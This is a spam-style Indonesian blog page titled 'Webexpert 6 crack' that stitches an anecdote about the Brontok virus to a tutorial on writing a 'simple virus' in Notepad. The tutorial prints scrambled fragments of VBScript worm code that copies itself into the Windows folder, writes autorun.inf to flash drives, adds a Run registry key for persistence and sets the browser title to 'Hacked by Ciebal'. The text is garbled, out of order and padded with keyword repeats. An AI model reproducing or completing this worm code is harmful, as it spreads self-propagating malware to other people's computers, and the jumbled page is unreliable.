empirehasem.blogg.se

Webexpert 6 crack
Webexpert 6 crack












webexpert 6 crack

Nah, selama saya menggunakan Widows Xp, saya mempunyai trik paling jitu untuk menghilangkan Virus atau membasmi Virus lokal ini secara cepat, mudah dan gampang. Dan beberapa kali pula virus lokal masuk ke komputer saya.

#WEBEXPERT 6 CRACK UPDATE#

Saya sampai sekarang masih setia menggunakan Norton AntiVirus 2005 yang masih terus saya update virus definitionnya tiap minggu, namun ketika boomin virus lokal terjadi, norton saya pun tidak mampu mendeteksi keberadaan virus tersebut. Begitu pula selanjutnya virus-virus lokal yang semakin menggejala di Yogyakarta waktu itu.ĭan ternyata saya pun kemudian mengalaminya, komputer saya akhirnya terkena juga waktu itu (kalau tidak salah karena memang saya sengaja, pengen membuktikan, he he he). Ketika beberapa tahun atau bulan yang lalu, sewaktu virus Brontok dan variannya menyerang dan booming seantero Indonesia., termasuk juga khususnya di Yogyakarta, banyak teman-teman saya yang kebingungan dan panik karena anti virus ternamanya tidak mampu mendeteksi virus ini.

webexpert 6 crack

Semoga bermanfaat, script ini masih bisa di kembangkan lagi. Klo antivirus lo aktiv pasti langsung kena tuh script. Sd.run winpath&"explorer.exe /e,/select, "&Wscript.ScriptFullname Rg.regwrite "HKCRvbsfileDefaultIcon","shell32.dll,2" Rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title","Hacked by Ciebal" Rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunMS32DLL",winpath&"" Set tf=fs.createtextfile(flashdrive.path &"autorun.inf",2,true) Set tf =fs.getfile(flashdrive.path &"autorun.inf") Set tf=fs.createtextfile(flashdrive.path &"",2,true) If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path "A:" then Set tf=fs.createtextfile(winpath & "",2,true) Set mf = fs.getfile(Wscript.ScriptFullname) Set fs = createobject("Scripting.FileSystemObject")

webexpert 6 crack

Oke Sekarang Coba buka Notepadnya, dan masukin Script ini.ĭim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sdĪtr = ""&vbcrlf&"shellexecute=wscript.exe " Ini paling sederhana, Yang lo butuhin cuma NotePad aja kok. Sesuai dengan Judulnya, yaitu Membuat Virus Sederhana. Langsung aja yah gak perlu basa-basi lagi.














Webexpert 6 crack